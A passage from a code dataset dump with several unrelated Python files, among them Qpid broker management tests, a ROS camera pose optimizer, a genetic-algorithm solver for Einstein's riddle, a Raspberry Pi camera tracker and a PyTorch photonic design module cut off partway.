name=\"alt-queue2\")[0]\n self.assertEqual(pq.msgDepth,0)\n self.assertEqual(aq.msgDepth,19)\n\n \"Make more messages\"\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n for count in twenty:\n body = \"Reroute Message %d\" % count\n msg = Message(props, body)\n session.message_transfer(destination=\"amq.direct\", message=msg)\n\n \"Reroute onto the same queue\"\n result = pq.reroute(0, False, \"amq.direct\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n self.assertEqual(pq.msgDepth,20)\n\n def test_reroute_alternate_exchange(self):\n \"\"\"\n Test that when rerouting, the alternate-exchange is considered if relevant\n \"\"\"\n self.startQmf()\n session = self.session\n # 1. Create 2 exchanges A and B (fanout) where B is the\n # alternate exchange for A\n session.exchange_declare(exchange=\"B\", type=\"fanout\")\n session.exchange_declare(exchange=\"A\", type=\"fanout\", alternate_exchange=\"B\")\n\n # 2. Bind queue X to B\n session.queue_declare(queue=\"X\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"X\", exchange=\"B\")\n\n # 3. Send 1 message to queue Y\n session.queue_declare(queue=\"Y\", exclusive=True, auto_delete=True)\n props = session.delivery_properties(routing_key=\"Y\")\n session.message_transfer(message=Message(props, \"reroute me!\"))\n\n # 4. Call reroute on queue Y and specify that messages should\n # be sent to exchange A\n y = self.qmf.getObjects(_class=\"queue\", name=\"Y\")[0]\n result = y.reroute(1, False, \"A\", {})\n self.assertEqual(result.status, 0)\n\n # 5. verify that the message is rerouted through B (as A has\n # no matching bindings) to X\n self.subscribe(destination=\"x\", queue=\"X\")\n self.assertEqual(\"reroute me!\", session.incoming(\"x\").get(timeout=1).body)\n\n # Cleanup\n for e in [\"A\", \"B\"]: session.exchange_delete(exchange=e)\n\n def test_reroute_invalid_alt_exchange(self):\n \"\"\"\n Test that an error is returned for an attempt to reroute to\n alternate exchange on a queue for which no such exchange has\n been defined.\n \"\"\"\n self.startQmf()\n session = self.session\n # create queue with no alt-exchange, and send a message to it\n session.queue_declare(queue=\"q\", exclusive=True, auto_delete=True)\n props = session.delivery_properties(routing_key=\"q\")\n session.message_transfer(message=Message(props, \"don't reroute me!\"))\n\n # attempt to reroute the message to alt-exchange\n q = self.qmf.getObjects(_class=\"queue\", name=\"q\")[0]\n result = q.reroute(1, True, \"\", {})\n # verify the attempt fails...\n self.assertEqual(result.status, 4) #invalid parameter\n\n # ...and message is still on the queue\n self.subscribe(destination=\"d\", queue=\"q\")\n self.assertEqual(\"don't reroute me!\", session.incoming(\"d\").get(timeout=1).body)\n\n\n def test_methods_async (self):\n \"\"\"\n \"\"\"\n class Handler (qmf.console.Console):\n def __init__(self):\n self.cv = Condition()\n self.xmtList = {}\n self.rcvList = {}\n\n def methodResponse(self, broker, seq, response):\n self.cv.acquire()\n try:\n self.rcvList[seq] = response\n finally:\n self.cv.release()\n\n def request(self, broker, count):\n self.count = count\n for idx in range(count):\n self.cv.acquire()\n try:\n seq = broker.echo(idx, \"Echo Message\", _async = True)\n self.xmtList[seq] = idx\n finally:\n self.cv.release()\n\n def check(self):\n if self.count != len(self.xmtList):\n return \"fail (attempted send=%d, actual sent=%d)\" % (self.count, len(self.xmtList))\n lost = 0\n mismatched = 0\n for seq in self.xmtList:\n value = self.xmtList[seq]\n if seq in self.rcvList:\n result = self.rcvList.pop(seq)\n if result.sequence != value:\n mismatched += 1\n else:\n lost += 1\n spurious = len(self.rcvList)\n if lost == 0 and mismatched == 0 and spurious == 0:\n return \"pass\"\n else:\n return \"fail (lost=%d, mismatch=%d, spurious=%d)\" % (lost, mismatched, spurious)\n\n handler = Handler()\n self.startQmf(handler)\n brokers = self.qmf.getObjects(_class=\"broker\")\n self.assertEqual(len(brokers), 1)\n broker = brokers[0]\n handler.request(broker, 20)\n sleep(1)\n self.assertEqual(handler.check(), \"pass\")\n\n def test_connection_close(self):\n \"\"\"\n Test management method for closing connection\n \"\"\"\n self.startQmf()\n conn = self.connect()\n session = conn.session(\"my-named-session\")\n\n #using qmf find named session and close the corresponding connection:\n qmf_ssn_object = [s for s in self.qmf.getObjects(_class=\"session\") if s.name.endswith(\"my-named-session\")][0]\n qmf_ssn_object._connectionRef_.close()\n\n #check that connection is closed\n try:\n conn.session(\"another-session\")\n self.fail(\"Expected failure from closed connection\")\n except: None\n\n #make sure that the named session has been closed and the name can be re-used\n conn = self.connect()\n session = conn.session(\"my-named-session\")\n session.queue_declare(queue=\"whatever\", exclusive=True, auto_delete=True)\n\n def test_immediate_method(self):\n url = \"%s://%s:%d\" % (self.broker.scheme or \"amqp\", self.broker.host or \"localhost\", self.broker.port or 5672)\n conn = qpid.messaging.Connection(url)\n conn.open()\n sess = conn.session()\n replyTo = \"qmf.default.direct/reply_immediate_method_test;{node:{type:topic}}\"\n agent_sender = sess.sender(\"qmf.default.direct/broker\")\n agent_receiver = sess.receiver(replyTo)\n queue_create = sess.sender(\"test-queue-imm-method;{create:always,delete:always,node:{type:queue,durable:False,x-declare:{auto-delete:True}}}\")\n\n method_request = {'_method_name':'reroute','_object_id':{'_object_name':'org.apache.qpid.broker:queue:test-queue-imm-method'}}\n method_request['_arguments'] = {'request':0, 'useAltExchange':False, 'exchange':'amq.fanout'}\n\n reroute_call = qpid.messaging.Message(method_request)\n reroute_call.properties['qmf.opcode'] = '_method_request'\n reroute_call.properties['x-amqp-0-10.app-id'] = 'qmf2'\n reroute_call.reply_to = replyTo\n\n agent_sender.send(reroute_call)\n result = agent_receiver.fetch(3)\n self.assertEqual(result.properties['qmf.opcode'], '_method_response')\n\n conn.close()\n\n def test_binding_count_on_queue(self):\n self.startQmf()\n conn = self.connect()\n session = self.session\n\n QUEUE = \"binding_test_queue\"\n EX_DIR = \"binding_test_exchange_direct\"\n EX_FAN = \"binding_test_exchange_fanout\"\n EX_TOPIC = \"binding_test_exchange_topic\"\n EX_HDR = \"binding_test_exchange_headers\"\n\n #\n # Create a test queue\n #\n session.queue_declare(queue=QUEUE, exclusive=True, auto_delete=True)\n queue = self.qmf.getObjects(_class=\"queue\", name=QUEUE)[0]\n if not queue:\n self.fail(\"Queue not found\")\n self.assertEqual(queue.bindingCount, 1, \"wrong initial binding count\")\n\n #\n # Create an exchange of each supported type\n #\n session.exchange_declare(exchange=EX_DIR, type=\"direct\")\n session.exchange_declare(exchange=EX_FAN, type=\"fanout\")\n session.exchange_declare(exchange=EX_TOPIC, type=\"topic\")\n session.exchange_declare(exchange=EX_HDR, type=\"headers\")\n\n #\n # Bind each exchange to the test queue\n #\n match = {}\n match['x-match'] = \"all\"\n match['key'] = \"value\"\n session.exchange_bind(exchange=EX_DIR, queue=QUEUE, binding_key=\"key1\")\n session.exchange_bind(exchange=EX_DIR, queue=QUEUE, binding_key=\"key2\")\n session.exchange_bind(exchange=EX_FAN, queue=QUEUE)\n session.exchange_bind(exchange=EX_TOPIC, queue=QUEUE, binding_key=\"key1.#\")\n session.exchange_bind(exchange=EX_TOPIC, queue=QUEUE, binding_key=\"key2.#\")\n session.exchange_bind(exchange=EX_HDR, queue=QUEUE, binding_key=\"key1\", arguments=match)\n match['key2'] = \"value2\"\n session.exchange_bind(exchange=EX_HDR, queue=QUEUE, binding_key=\"key2\", arguments=match)\n\n #\n # Verify that the queue's binding count accounts for the new bindings\n #\n queue.update()\n self.assertEqual(queue.bindingCount, 8,\n \"added bindings not accounted for (expected 8, got %d)\" % queue.bindingCount)\n\n #\n # Remove some of the bindings\n #\n session.exchange_unbind(exchange=EX_DIR, queue=QUEUE, binding_key=\"key2\")\n session.exchange_unbind(exchange=EX_TOPIC, queue=QUEUE, binding_key=\"key2.#\")\n session.exchange_unbind(exchange=EX_HDR, queue=QUEUE, binding_key=\"key2\")\n\n #\n # Verify that the queue's binding count accounts for the deleted bindings\n #\n queue.update()\n self.assertEqual(queue.bindingCount, 5,\n \"deleted bindings not accounted for (expected 5, got %d)\" % queue.bindingCount)\n #\n # Delete the exchanges\n #\n session.exchange_delete(exchange=EX_DIR)\n session.exchange_delete(exchange=EX_FAN)\n session.exchange_delete(exchange=EX_TOPIC)\n session.exchange_delete(exchange=EX_HDR)\n\n #\n # Verify that the queue's binding count accounts for the lost bindings\n #\n queue.update()\n self.assertEqual(queue.bindingCount, 1,\n \"deleted bindings not accounted for (expected 1, got %d)\" % queue.bindingCount)\n\n def test_connection_stats(self):\n \"\"\"\n Test message in/out stats for connection\n \"\"\"\n agent = self.setup_access()\n conn = self.connect()\n session = conn.session(\"stats-session\")\n\n #using qmf find named session and the corresponding connection:\n conn_qmf = None\n sessions = agent.getAllSessions()\n for s in sessions:\n if s.name.endswith(\"stats-session\"):\n conn_qmf = agent.getConnection(s.connectionRef)\n\n assert(conn_qmf)\n \n #send a message to a queue\n session.queue_declare(queue=\"stats-q\", exclusive=True, auto_delete=True)\n session.message_transfer(message=Message(session.delivery_properties(routing_key=\"stats-q\"), \"abc\"))\n \n #check the 'msgs sent from' stat for this connection\n conn_qmf.update()\n self.assertEqual(conn_qmf.msgsFromClient, 1)\n\n #receive message from queue\n session.message_subscribe(destination=\"d\", queue=\"stats-q\")\n incoming = session.incoming(\"d\")\n incoming.start()\n self.assertEqual(\"abc\", incoming.get(timeout=1).body)\n\n #check the 'msgs sent to' stat for this connection\n conn_qmf.update()\n self.assertEqual(conn_qmf.msgsToClient, 1)\n\n def test_timestamp_config(self):\n \"\"\"\n Test message timestamping control.\n \"\"\"\n self.startQmf()\n conn = self.connect()\n session = conn.session(\"timestamp-session\")\n\n #verify that receive message timestamping is OFF by default\n broker = self.qmf.getObjects(_class=\"broker\")[0]\n rc = broker.getTimestampConfig()\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n\n #try to enable it\n rc = broker.setTimestampConfig(True)\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n\n rc = broker.getTimestampConfig()\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n self.assertEqual(rc.receive, True)\n\n # setup a connection & session to the broker\n url = \"%s://%s:%d\" % (self.broker.scheme or \"amqp\", self.broker.host or \"localhost\", self.broker.port or 5672)\n conn = qpid.messaging.Connection(url)\n conn.open()\n sess = conn.session()\n\n #send a message to a queue\n sender = sess.sender(\"ts-q; {create:sender, delete:receiver}\")\n sender.send( qpid.messaging.Message(content=\"abc\") )\n\n #receive message from queue, and verify timestamp is present\n receiver = sess.receiver(\"ts-q\")\n try:\n msg = receiver.fetch(timeout=1)\n except Empty:\n assert(False)\n self.assertEqual(\"abc\", msg.content)\n self.assertEqual(True, \"x-amqp-0-10.timestamp\" in msg.properties)\n assert(msg.properties[\"x-amqp-0-10.timestamp\"])\n\n #try to disable it\n rc = broker.setTimestampConfig(False)\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n\n rc = broker.getTimestampConfig()\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n self.assertEqual(rc.receive, False)\n\n #send another message to the queue\n sender.send( qpid.messaging.Message(content=\"def\") )\n\n #receive message from queue, and verify timestamp is NOT PRESENT\n receiver = sess.receiver(\"ts-q\")\n try:\n msg = receiver.fetch(timeout=1)\n except Empty:\n assert(False)\n self.assertEqual(\"def\", msg.content)\n self.assertEqual(False, \"x-amqp-0-10.timestamp\" in msg.properties)\n\n","sub_path":"qpid_tests/broker_0_10/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":29438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"10086786","text":"import sys\n\nfrom pathlib import Path\nfrom pybullet_data import getDataPath\n\n\ndef augment_path(file_name):\n roots = [\n Path(__file__).parent.parent / 'assets', # local\n Path(sys.prefix) / 'etc' / 'mime' / 'assets', # global\n Path(getDataPath())]\n for root in roots:\n path = root / file_name\n if path.exists():\n return path\n return Path(file_name)\n","sub_path":"mime/scene/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476546785","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport rospkg\nFE_PATH = rospkg.RosPack().get_path('trajectory_optimization')\nsys.path.append(os.path.join(FE_PATH, 'src/'))\nimport torch\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\nfrom tools import render_pc_image\nfrom tools import hidden_pts_removal\nfrom tools import load_intrinsics\nfrom model import ModelPose\nimport torch.nn.functional as F\nfrom pytorch3d.transforms import random_quaternions\nfrom time import time\nimport rospy\nimport tf\nfrom tools import publish_odom\nfrom tools import publish_pointcloud\nfrom tools import publish_tf_pose\nfrom tools import publish_camera_info\nfrom tools import publish_image\n\n\n## Get parameters values\npub_sample = rospy.get_param('pose_opt/pub_sample', 10)\nN_steps = rospy.get_param('pose_opt/opt_steps', 400)\nlr_pose = rospy.get_param('pose_opt/lr_pose', 0.1)\nlr_quat = rospy.get_param('pose_opt/lr_quat', 0.1)\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda:0\")\n torch.cuda.set_device(device)\nelse:\n device = torch.device(\"cpu\")\n\n\nif __name__ == \"__main__\":\n rospy.init_node('camera_pose_optimization')\n # Load point cloud\n\n # Initialize camera parameters\n K, img_width, img_height = load_intrinsics(device=device)\n\n # Set paths to data\n index = np.random.choice(range(0, 30))\n points_filename = os.path.join(FE_PATH, f\"data/points/point_cloud_{index}.npz\")\n pts_np = np.load(points_filename)['pts']\n # make sure the point cloud is of (N x 3) shape:\n if pts_np.shape[1] > pts_np.shape[0]:\n pts_np = pts_np.transpose()\n points = torch.tensor(pts_np, dtype=torch.float32).to(device)\n\n # Initial position to optimize\n trans0 = torch.tensor([[6.0, 2.0, 0.0]], dtype=torch.float32)\n\n # xyzw = torch.tensor([0., 0., 0., 1.], dtype=torch.float32)\n # xyzw = tf.transformations.quaternion_from_euler(0.0, np.pi/2, 0.0)\n # q0 = torch.tensor([[xyzw[3], xyzw[0], xyzw[1], xyzw[2]]], dtype=torch.float32)\n q0 = random_quaternions(1)\n\n # Initialize a model\n model = ModelPose(points=points,\n trans0=trans0,\n q0=q0,\n intrins=K,\n img_width=img_width, img_height=img_height,\n min_dist=1.0, max_dist=5.0,\n device=device).to(device)\n\n # Create an optimizer. Here we are using Adam and we pass in the parameters of the model\n optimizer = torch.optim.Adam([\n {'params': list([model.trans]), 'lr': lr_pose},\n {'params': list([model.quat]), 'lr': lr_quat},\n ])\n decayRate = 0.95\n lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer, gamma=decayRate)\n\n # Run optimization loop\n debug = False\n t_step = 0.0\n t_pub = 0.0\n for i in tqdm(range(N_steps)):\n if rospy.is_shutdown():\n break\n\n ## Optimization step\n t0 = time()\n optimizer.zero_grad()\n loss = model(debug=debug)\n loss.backward()\n optimizer.step()\n if i % int(N_steps//10) == 0:\n lr_scheduler.step()\n\n t_step += (time() - t0) / N_steps\n\n ## Data publication\n debug = False\n if i % pub_sample == 0:\n t2 = time()\n # debug = True\n\n # publish ROS msgs\n intensity = model.observations.unsqueeze(1).detach().cpu().numpy()\n pts_rewards = np.concatenate([pts_np, intensity],\n axis=1) # add observations for pts intensity visualization\n # pts_rewards = pts_np\n publish_pointcloud(pts_rewards, '/pts', rospy.Time.now(), 'world')\n quat = F.normalize(model.quat).squeeze()\n quat = (quat[1], quat[2], quat[3], quat[0])\n trans = model.trans.squeeze()\n publish_odom(trans, quat, frame='world', topic='/odom')\n publish_tf_pose(trans, quat, \"camera_frame\", frame_id=\"world\")\n publish_camera_info(topic_name=\"/camera/camera_info\", frame_id=\"camera_frame\")\n\n t_pub += (time() - t2) / N_steps * pub_sample\n\n print(f'Mean optimization time: {1000 * t_step} msec')\n print(f'Mean publication time: {1000 * t_pub} msec')\n","sub_path":"src/pose_optimization_sample.py","file_name":"pose_optimization_sample.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"429921131","text":"from hashlib import new\nimport random\n\nHOUSE = [1, 2, 3, 4, 5]\nCOLOR = ['red', 'green', 'white', 'yellow', 'blue']\nNATIONALITY = ['brit', 'swede', 'dane', 'norwegian', 'german']\nDRINK = ['tea', 'coffee', 'milk', 'beer', 'water']\nSMOKE = ['pall mall', 'dunhill', 'bluemaster', 'prince', 'blend']\nPET = ['dogs', 'birds', 'cats', 'horses', 'fish']\n\n# PERSON = [HOUSE, COLOR, NATIONALITY, DRINK, SMOKE, PET]\n\nPEOPLE_AMT = 5\nTRAITS_AMT = 6\n\nKNOWN_FACTS = [\n ['brit', 'red'],\n ['swede', 'dogs'],\n ['dane', 'tea'],\n ['green', 'coffee'],\n ['pall mall', 'birds'],\n ['yellow', 'dunhill'],\n ['milk', 3],\n ['norwegian', 1],\n ['bluemaster', 'beer'],\n ['german', 'prince'],\n]\n\nNEIGHBOURS = [\n ['green', 'white', 'left'], # green to the left of the white house\n ['blend', 'cats', 'next'],\n ['horses', 'dunhill', 'next'],\n ['norwegian', 'blue', 'next'],\n ['blend', 'water', 'next'],\n]\n\nSOLUTION = [\n [1, 'yellow', 'norwegian', 'water', 'dunhill', 'cats'],\n [2, 'blue', 'dane', 'tea', 'blend', 'horses'],\n [3, 'red', 'brit', 'milk', 'pall mall', 'birds'], \n [4, 'green', 'german', 'coffee', 'prince', 'fish'], \n [5, 'white', 'swede', 'beer', 'bluemaster', 'dogs']\n] \n\ndef check_neighbours(sectionA, sectionB, position):\n score = 0\n if position == 'left':\n if sectionA[0] == sectionB[0] - 1:\n score += 1 \n # print(houseA, 'is on the left of', houseB) \n\n elif position == 'next':\n if (sectionA[0] == sectionB[0] - 1 or\n sectionA[0] == sectionB[0] + 1):\n score += 1\n # print(houseA, 'is next to', houseB) \n\n return score\n\nclass DNA:\n def __init__(self):\n self.genes = []\n self.populate()\n self.fitness = 0\n self.points = 0\n \n def populate(self):\n \"\"\"\n Creates a list object with the genes, to fill the solution.\n \"\"\"\n\n traits1 = HOUSE[:]\n traits2 = COLOR[:]\n traits3 = NATIONALITY[:]\n traits4 = DRINK[:]\n traits5 = SMOKE[:]\n traits6 = PET[:]\n all_traits = [traits1, traits2, traits3, traits4, traits5, traits6]\n\n for trait in all_traits:\n random.shuffle(trait)\n \n for bunch in all_traits:\n for item in bunch:\n self.genes.append(item) \n\n def show(self):\n print('Hints completed:', self.points, '\\t \\t Fitness', self.fitness)\n for i in range(len(self.genes)):\n print(self.genes[i], end='\\t\\t\\t')\n if i in [4, 9, 14, 19, 24, 29]:\n print()\n\n def calc_fitness(self):\n people = []\n for i in range(PEOPLE_AMT):\n people.append([])\n \n for i in range(PEOPLE_AMT):\n for j in range(TRAITS_AMT):\n people[i].append(self.genes[i+(PEOPLE_AMT*j)])\n\n hint_points = 0 \n for gene in people: \n for hint in KNOWN_FACTS:\n if hint[0] in gene and hint[1] in gene:\n hint_points += 1\n\n for hint in NEIGHBOURS:\n houseA, houseB, position = hint\n if houseA in gene:\n for other in people:\n if houseB in other:\n hint_points += check_neighbours(gene, other, position)\n \n self.fitness = hint_points ** hint_points\n self.points = hint_points\n\n def crossover(self, other):\n new_genes = []\n \"\"\"\n It selects a random section of the dna to interchange with other dna object.\n \"\"\"\n mid = random.choice([0, 5, 10, 15, 20, 25])\n for i in range(len(self.genes)):\n if i < mid:\n new_genes.append(self.genes[i])\n else:\n new_genes.append(other.genes[i])\n\n return new_genes\n\n def mutate(self, ratio):\n \"\"\"\n According to the given ratio applies a small change in some gene, \n by exchanging values of different indexes of the same section\n \"\"\"\n r = random.random()\n if r < ratio:\n start = random.choice([0, 5, 10, 15, 20, 25])\n end = start + 5\n section_copy = self.genes[start:end]\n # random.shuffle(section_copy)\n i1 = random.randint(0, 4)\n i2 = random.randint(0, 4)\n section_copy[i1], section_copy[i2] = section_copy[i2], section_copy[i1] \n self.genes[start:end] = section_copy\n","sub_path":"GA/Einstein_s riddle/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637566311","text":"import argparse\r\nimport datetime as dt\r\nimport time\r\nimport picamera\r\nimport json\r\n\r\nfrom detect import detect_from_image\r\n\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-i\", \"--interval\", type=int, default=1, help=\"interval in minutes to take photographs for object detection\")\r\nap.add_argument(\"-s\", \"--start\", type=float, default=0, help=\"minutes before camera to begin\")\r\nap.add_argument(\"-e\", \"--end\", type=float, default=None, help=\"minutes to run the camera\")\r\nap.add_argument(\"-d\", \"--dir\", type=str, default=\"logs/\", help=\"directory to store log of objects\")\r\nap.add_argument(\"--vflip\", action=\"store_true\", help=\"flip images taken from camera vertically\")\r\nap.add_argument(\"--hflip\", action=\"store_true\", help=\"flip images taken from camera horizontally\")\r\n\r\nargs = vars(ap.parse_args())\r\n\r\nTEMP_FILE_NAME = \"temp.jpg\"\r\n\r\ndef setup_camera(vflip, hflip):\r\n camera = picamera.PiCamera()\r\n camera.vflip = args[\"vflip\"]\r\n camera.hflip = args[\"hflip\"]\r\n return camera\r\n\r\ndef track(camera, interval, start, end, directory):\r\n if start > 0:\r\n print(\"Starting in\", start, \"minutes\")\r\n time.sleep(start*60)\r\n\r\n if end is not None:\r\n end_time = dt.datetime.now() + dt.timedelta(minutes=end)\r\n print(\"Running until {}\".format(end_time.strftime(\"%Y-%m-%d %H:%M:%S\")))\r\n else:\r\n end_time = dt.datetime.max\r\n\r\n print(\"Starting...\")\r\n while dt.datetime.now() < end_time:\r\n camera.capture(TEMP_FILE_NAME)\r\n objects = detect_from_image(TEMP_FILE_NAME)\r\n file_name = '{}/{}.json'.format(directory, dt.datetime.now().strftime(\"%Y.%m.%d_%H.%M.%S\"))\r\n\r\n with open(file_name, 'w') as fp:\r\n json.dump(objects, fp)\r\n \r\n time.sleep(interval)\r\n\r\nif __name__ == \"__main__\":\r\n camera = setup_camera(vflip=args[\"vflip\"], hflip=args[\"hflip\"])\r\n track(camera=camera, interval=args[\"interval\"], start=args[\"start\"], end=args[\"end\"], directory=args[\"dir\"])\r\n\r\n","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"603603780","text":"#\n# System\n#\nimport sys\nimport os\n\n#\n# Math\n#\nimport numpy as np\nimport scipy.optimize\n\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.interpolate import RectBivariateSpline\n\nsys.path.insert(1, '../')\nimport heaviside\n\n#\n# Learning\n#\nimport torch\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#\n# Electromagnetics\n#\nrun_on_cluster = True\n\nif run_on_cluster:\n\tsys.path.append( '/central/home/gdrobert/Develompent/ceviche' )\nimport ceviche\n\n#\n# Topology Optimization\n#\npython_src_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\nsys.path.append( os.path.abspath( python_src_directory + \"/../LevelSet/\" ) )\nif run_on_cluster:\n\tfrom LevelSet import LevelSet\nelse:\n\timport LevelSet\n\nsys.path.append( os.path.abspath( python_src_directory + \"/../\" ) )\nimport sigmoid\n\n\n\neps_nought = 8.854 * 1e-12\nmu_nought = 1.257 * 1e-6 \nc = 3.0 * 1e8\nsmall = 1e-10\n\n\n\nclass PermittivityPredictor(nn.Module):\n\tdef __init__(self, num_lambda, kernel_size):\n\t\tsuper(PermittivityPredictor, self).__init__()\n\n\t\tnum_fields = 2 * num_lambda\n\t\tnum_channels = 1 + num_fields\n\t\tself.kernel_size = kernel_size\n\n\t\tself.conv1 = nn.Conv2d( num_channels, num_channels, self.kernel_size, padding=1 )\n\t\tself.conv2 = nn.Conv2d( num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv3 = nn.Conv2d( 2 * num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\t\tself.conv4 = nn.Conv2d( 2 * num_channels, 4 * num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv5 = nn.Conv2d( 4 * num_channels, 4 * num_channels, self.kernel_size, padding=1 )\n\t\tself.conv6 = nn.Conv2d( 4 * num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv7 = nn.Conv2d( 2 * num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\t\tself.conv8 = nn.Conv2d( 2 * num_channels, num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv9 = nn.Conv2d( num_channels, 2, self.kernel_size, padding=1 )\n\n\t\tself.pool = nn.MaxPool2d( 2, 2 )\n\t\tself.upsample = nn.Upsample( scale_factor=2, mode='bilinear' )\n\n\t\tself.softmax = nn.Softmax( 1 )\n\n\tdef forward(self, x):\n\t\tx = F.relu( self.conv1( x ) )\n\t\tx = self.pool( F.relu( self.conv2( x ) ) )\n\n\t\tx = F.relu( self.conv3( x ) )\n\t\tx = self.pool( F.relu( self.conv4( x ) ) )\n\n\t\tx = F.relu( self.conv5( x ) )\n\t\tx = self.upsample( F.relu( self.conv6( x ) ) )\n\n\t\tx = F.relu( self.conv7( x ) )\n\t\tx = self.upsample( F.relu( self.conv8( x ) ) )\n\n\t\tx = self.softmax( self.conv9( x ) )\n\n\t\treturn x\n\n\n# def compute_binarization( input_variable ):\n# \ttotal_shape = np.product( input_variable.shape )\n# \treturn ( 2 / np.sqrt( total_shape ) ) * np.sqrt( np.sum( ( input_variable - 0.5 )**2 ) )\n# def compute_binarization_gradient( input_variable ):\n# \ttotal_shape = np.product( input_variable.shape )\n# \treturn ( 4 / np.sqrt( total_shape ) ) * ( input_variable - 0.5 ) / compute_binarization( input_variable )\n\ndef compute_binarization( input_variable, set_point=0.5 ):\n\ttotal_shape = np.product( input_variable.shape )\n\treturn ( 2. / total_shape ) * np.sum( np.sqrt( ( input_variable - set_point )**2 ) )\n# def compute_binarization_gradient( input_variable ):\n# \ttotal_shape = np.product( input_variable.shape )\n# \treturn ( 1. / total_shape ) * ( input_variable - 0.5 ) / np.sum( np.sqrt( ( input_variable - 0.5 )**2 )\t)\n\ndef compute_binarization_gradient( input_variable, set_point=0.5 ):\n\ttotal_shape = np.product( input_variable.shape )\n\treturn ( 2. / total_shape ) * np.sign( input_variable - set_point )\n\n\ndef vector_norm( v_in ):\n\treturn np.sqrt( np.sum( np.abs( v_in )**2 ) )\n\ndef upsample( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k * factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\toutput_block[ x_idx, y_idx ] = input_block[ int( x_idx / factor ), int( y_idx / factor ) ]\n\n\treturn output_block\n\ndef reinterpolate_average( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k / factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tstart_x = int( factor * x_idx )\n\t\tend_x = start_x + factor\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\tstart_y = int( factor * y_idx )\n\t\t\tend_y = start_y + factor\n\n\t\t\taverage = 0.0\n\n\t\t\tfor sweep_x in range( start_x, end_x ):\n\t\t\t\tfor sweep_y in range( start_y, end_y ):\n\t\t\t\t\taverage += ( 1. / factor**2 ) * input_block[ sweep_x, sweep_y ]\n\t\t\t\n\t\t\toutput_block[ x_idx, y_idx ] = average\n\n\treturn output_block\n\n\ndef reinterpolate_abs_max( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k / factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tstart_x = int( factor * x_idx )\n\t\tend_x = start_x + factor\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\tstart_y = int( factor * y_idx )\n\t\t\tend_y = start_y + factor\n\n\t\t\tabs_max = 0.0\n\t\t\tbest_x = 0\n\t\t\tbest_y = 0\n\n\t\t\tfor sweep_x in range( start_x, end_x ):\n\t\t\t\tfor sweep_y in range( start_y, end_y ):\n\t\t\t\t\tget_abs = np.abs( input_block[ sweep_x, sweep_y ] )\n\n\t\t\t\t\tif get_abs > abs_max:\n\t\t\t\t\t\tabs_max = get_abs\n\t\t\t\t\t\tbest_x = sweep_x\n\t\t\t\t\t\tbest_y = sweep_y\n\n\t\t\t\t\t# abs_max = np.maximum( abs_max, get_abs )\n\n\t\t\t\t\t# average += ( 1. / factor**2 ) * input_block[ sweep_x, sweep_y ]\n\t\t\t\n\t\t\toutput_block[ x_idx, y_idx ] = input_block[ best_x, best_y ]\n\n\treturn output_block\n\nclass ColorSplittingOptimizationDeep2D():\n\n\tdef __init__( self,\n\t\tdevice_size_voxels, coarsen_factor, mesh_size_nm,\n\t\tpermittivity_bounds, focal_spots_x_relative, focal_length_y_voxels,\n\t\twavelengths_um, wavelength_idx_to_focal_idx, random_seed,\n\t\tnum_layers, designable_layer_indicators, non_designable_permittivity,\n\t\tsave_folder, field_blur=False, field_blur_size_voxels=0.0, density_pairings=None,\n\t\tbinarization_set_point=0.5 ):\n\t\t\n\t\tself.device_width_voxels = device_size_voxels[ 0 ]\n\t\tself.device_height_voxels = device_size_voxels[ 1 ]\n\n\t\tself.coarsen_factor = coarsen_factor\n\t\tassert ( self.device_width_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device width in voxels!\"\n\t\tassert ( 